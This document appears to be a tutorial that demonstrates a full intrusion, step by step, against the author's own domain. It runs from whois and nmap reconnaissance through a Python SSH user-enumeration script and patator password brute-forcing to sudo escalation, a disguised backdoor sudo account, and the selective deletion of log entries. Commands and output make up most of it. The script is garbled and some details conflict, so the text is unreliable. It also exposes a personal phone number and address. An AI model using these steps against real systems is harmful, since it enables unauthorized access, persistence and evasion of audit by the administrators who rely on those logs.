A hacker can get his feet into a network via different techniques, and for different reasons.

A network
can be targeted from a hacker for what ever reason he has and in this case it will be a target of choice,
or it could be just a target of opporunity as he found it by a random scan.
-If a network is not a target of choice it doesn't mean that it is safe, because its just a matter of time
till it will become a target of opportunity.Usually hackers will go in these well known steps to gain access over a network,
1- Reconnaissance and Foot / Finger printing:- Mainly reconnaissance is the first step of an attack and
this phase is mostly about Information gathering. All information that the hacker can gather about the
victim even if it seems simple and useless. The hacker can collect this information via different ways,
for example,simple dumpster diving around the target's office, checking their staff social network
profiles, googling the target and note the information he will got or via Social engineering. The Foot
printing process will come after to complete the step. Foot printing is mainly to study the network, for
example, how devices are connected together, how many device the network have, infra structure,
firewalls, etc.
This phase depend on OSINT -Open source intelligence- with no direct contact with the target
2- Scanning:- The attacker will engage within the target for more specific details, for example open
ports and running services, lets say we got port 22 open then by a simple telnet command we can figure
the SSH version running in the server.
3- Enumeration, gaining access and privileges escalation:- Three different processes, firstly
Enumeration which will allow the hacker to know the valid accounts that he wants to obtain access for
via active connection, for example he knows for the above processes -Reconnaissance, foot printing
and scanning- that there is a SSH service running on -default- port 22, via enumerating the hacker can
know if a user is valid or not via simple python script. Next step will be reinforcing the valid account.
If he succeed to gain an access to the SSH server, then he will try do privileges escalation, if the bruteforced account doesn't have super user power.
4- Creating a backdoor and covering tracks:- In this phase the hacker already gained access and he
will install a rootkit, backdoor so he guarantee him self a free entrance to the network later on, for
example, creating a new user and adding it to the sudo list. Last step will be covering the tracks by
updating the logs via deleting his tracks from it.
A hacker will never delete the logs, as it will get the network administrator attention.

The above section was a short description in how a hacker can get into a network. The following
section will be a real life example to break into a network.
A real life example,
Let's say a hacker would like to takeover ashellz.com -It's owned by me- I will try to demonstrate the
process step by step according to the above explanation.
Reconnaissance and Foot printing:-

 Google the target domain ashellz.com

Whois the target domain.
root@Mox:/home/allamoox# whois ashellz.com
Registrant domain : Goddady.com
Tech Email: [email protected]
Name Server: NS8015.HOSTGATOR.COM
Name Server: NS8016.HOSTGATOR.COM
Tech Name: mahmoud allam
Tech Organization: aLLamoox
Tech Street: aol tarik shobar
Tech City: Tanta
Tech State/Province: gHARBIA
Tech Postal Code: 31111
Tech Country: EG
Tech Phone: +20.104691184
Dig the target domain.
root@Mox:/home/allamoox# dig ashellz.com any -Using dig with the switch any , to show all records.ashellz.com.
14385 IN
A
ashellz.com.
86385 IN
SOA
2016091826 86400 7200 3600000 86400
ashellz.com.
14385 IN
MX
ashellz.com.
14385 IN
TXT
ashellz.com.
86385 IN
NS
ashellz.com.
86385 IN
NS

192.185.16.67
ns8015.hostgator.com. dnsadmin.gator4008.hostgator.com.
0 mail.ashellz.com.
"v=spf1 a mx include:websitewelcome.com ~all"
ns8016.hostgator.com.
ns8015.hostgator.com

These processes can be considered as passive scan

Scanning:Will use nmap with switches O to detect the OS and sS so the connection close before completing the
three way handshake.
root@Mox:/home/allamoox# nmap -O -sS ashellz.com
PORT STATE SERVICE
21/tcp open ftp
22/tcp filtered ssh
25/tcp filtered smtp
26/tcp open rsftp
53/tcp open domain
80/tcp open http
110/tcp open pop3
135/tcp filtered msrpc

139/tcp filtered netbios-ssn

143/tcp open imap
443/tcp open https
445/tcp filtered microsoft-ds
465/tcp open smtps
587/tcp open submission
993/tcp open imaps
995/tcp open pop3s
2222/tcp open EtherNetIP-1
3306/tcp open mysql
8080/tcp open http-proxy
8443/tcp open https-alt
Aggressive OS guesses: Linux 3.11 - 4.1 (97%), Linux 3.2 - 3.8 (93%), Linux 2.6.32 (93%), Linux
2.6.32 - 2.6.33 (91%), Linux 3.13 (91%), Linux 2.6.32 - 2.6.39 (91%), Linux 4.0 (90%), Linux 3.10 4.1 (90%), Linux 3.16 - 3.19 (90%), Linux 4.4 (90%) .
root@Mox:/home/allamoox# telnet private.ashellz.com 22
Trying 158.69.197.45...
Connected to private.ashellz.com.
Escape character is '^]'.
SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u2
By a simple search about OpenSSH_6.0p1 Debian-4+deb7u6 hacker will know that It's vulnerable to
user enumerating..
These processes can be considered as active scan
Enumeration:The hacker at this point have a good idea about the target, and which parts are vulnerable and he will
start enumerating valid accounts for the SSH service via timing attack technique.
The technique here depend in the time that our server take to authenticate a user, so we will use a 10kb
password to which means if the user doesn't exist then we will get answer from the server faster than an
existing user.
The hacker will use this simple python script to enumerate valid users.
#Including the paramiko library
import paramiko
#Including the time library
import time
#Asking for the required username to be checked
user=raw_input("user: ")
#Supplying the Password as the letter A repeated 25000 times
p='A'*25000 -define password as letter A repeated 25000 timesssh = paramiko.SSHClient()
starttime=time.clock()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:

#Opening a SSH connection with the ashellz.com server with the user that we will chose and a 25000
letter password
ssh.connect('192.185.16.67', username=user,
password=p)
#Giving the taken time to authenticate an user
except:
endtime=time.clock()
total=endtime-starttime
print(total)
python code.py
Now we get a few valid accounts such as (root, allamoox, allam, test).
|Gaining access
Using patator -Python script used for brute forcing a lot of services like FTP, SSH, etc.- against
these users list.
allamoox@Mox:~$ patator ssh_login host=shell.ashellz.com user=FILE1 password=FILE0
1=/home/allamoox/user.txt 0=/home/allamoox/easy_guess.txt -x ignore:mesg='Authentication failed.'
17:45:12 patator INFO - Starting Patator v0.6 (http://code.google.com/p/patator/) at 2016-09-24
17:45 CEST
17:45:12 patator INFO 17:45:12 patator INFO - code size time | candidate
| num | mesg
17:45:12 patator INFO - ----------------------------------------------------------------------------17:51:22 patator INFO - 0 37 0.204 | test123:test
| 1308 | SSH-2.0OpenSSH_6.7p1 Debian-5+deb8u2
17:51:33 patator INFO - Hits/Done/Skip/Fail/Size: 2/1308/0/0/1308, Avg: 3 r/s, Time: 0h 1m 2s
The hacker get two accounts in just few minutes because of weak passwords.
privileges escalation
Now the hacker get a valid accounts he will check if it is in the sudo list or not via running any
command as a super user
test@aShellz:/home/allamoox$ sudo uptime
[sudo] password for test:
test is not in the sudoers file. This incident will be reported.
test@aShellz:/home/allamoox$ .
It isn't super user but still its very useful account. The hacker will try to list all the users in the server
via this command
test@aShellz:/home/allamoox$ cat /etc/group
bin:x:2:
sys:x:3:
adm:x:4:
tty:x:5:

disk:x:6:
lp:x:7:
mail:x:8:
news:x:9:
uucp:x:10:
man:x:12:
proxy:x:13:
kmem:x:15:
dialout:x:20:
fax:x:21:
voice:x:22:
cdrom:x:24:
floppy:x:25:
tape:x:26:
sudo:x:27:allamoox,xenthys,jack3
audio:x:29:
dip:x:30:
www-data:x:33:
backup:x:34:
operator:x:37:
list:x:38:
irc:x:39:
src:x:40:
gnats:x:41:
shadow:x:42:
utmp:x:43:
video:x:44:
sasl:x:45:
plugdev:x:46:
staff:x:50:
games:x:60:
users:x:100:
nogroup:x:65534:
netdev:x:101:
input:x:102:
systemd-journal:x:103:
systemd-timesync:x:104:
systemd-network:x:105:
systemd-resolve:x:106:
systemd-bus-proxy:x:107:
ssh:x:108:
messagebus:x:109:
Now the hacker will try to hack any of these accounts (sudo:x:27:allamoox,xenthys,jack3) and he will
own the server. Again he will try to brute force it via patator but with a bit complicated wordlist.
allamoox@Mox:~$ patator ssh_login host=shell.ashellz.com user=FILE1 password=FILE0
1=/home/allamoox/20_million_password_list_top_2000000.txt -x ignore:mesg='Authentication failed.'
17:45:12 patator INFO - Starting Patator v0.6 (http://code.google.com/p/patator/) at 2016-09-24

17:45 CEST
17:45:12 patator INFO 17:45:12 patator INFO - code size time | candidate
| num | mesg
17:45:12 patator INFO - ----------------------------------------------------------------------------17:51:22 patator INFO - 0 37 0.204 | qazxswedc123:jack3
| 1308 | SSH-2.0OpenSSH_6.7p1 Debian-5+deb8u2
17:51:33 patator INFO - Hits/Done/Skip/Fail/Size: 2/1308/0/0/1308, Avg: 3 r/s, Time: 21h 1m 49s.
As we can see jack3 used a pattern password, and it was included in a huge word list, so his account
get hacked. The hacker will log as root now.
jack3@aShellz:/home/jack3$ sudo su
[sudo] password for jack3:
root@aShellz:/home/jack3#
He will add another account and put it in the superusers list, to guarantee himself a free entrance into
the server in the future and will use a name like system.
root@aShellz:/home/allamoox# adduser system
Adding the user to sudo group
root@aShellz:/home/allamoox# usermod -G sudo system
root@aShellz:/home/allamoox# cat /etc/group |grep sudo
sudo:x:27:jack3,xenthys,allamoox,system
Then the hacker will clear his tracks from the log.
To know how many lines, words or characters in the log file.
root@aShellz:/home# wc /var/logs/auth.log
200601 2731431 21813737 logs.txt
more than 200k lines
the hack will open the file to delete only his tracks from the log, for example lines as the following
root@aShellz:/home# nano /var/logs/auth.log
Sep 24 21:27:32 vps1670 sshd[1719]: Failed password for root from 81.229. port 35784 ssh2
Sep 25 11:14:43 vps1670 passwd[1891]: pam_unix(passwd:chauthtok): password changed for jack3
Sep 24 21:50:26 vps1670 groupadd[1948]: group added to /etc/group: name=system, GID=1027
For sure there are many lines the hacker need to delete, he might use awk or sed command to
delete any line that start with the word failed password under this date Sep 24.
Last thing the hacker will do is to clear his commands from the history command as well.
P.S: The hacker can use completely different scenarios depending on the situation.

A solution could be, a good enforced security policy, and a program like Fail2ban to block any brute
force attempt, with a decent activated firewall.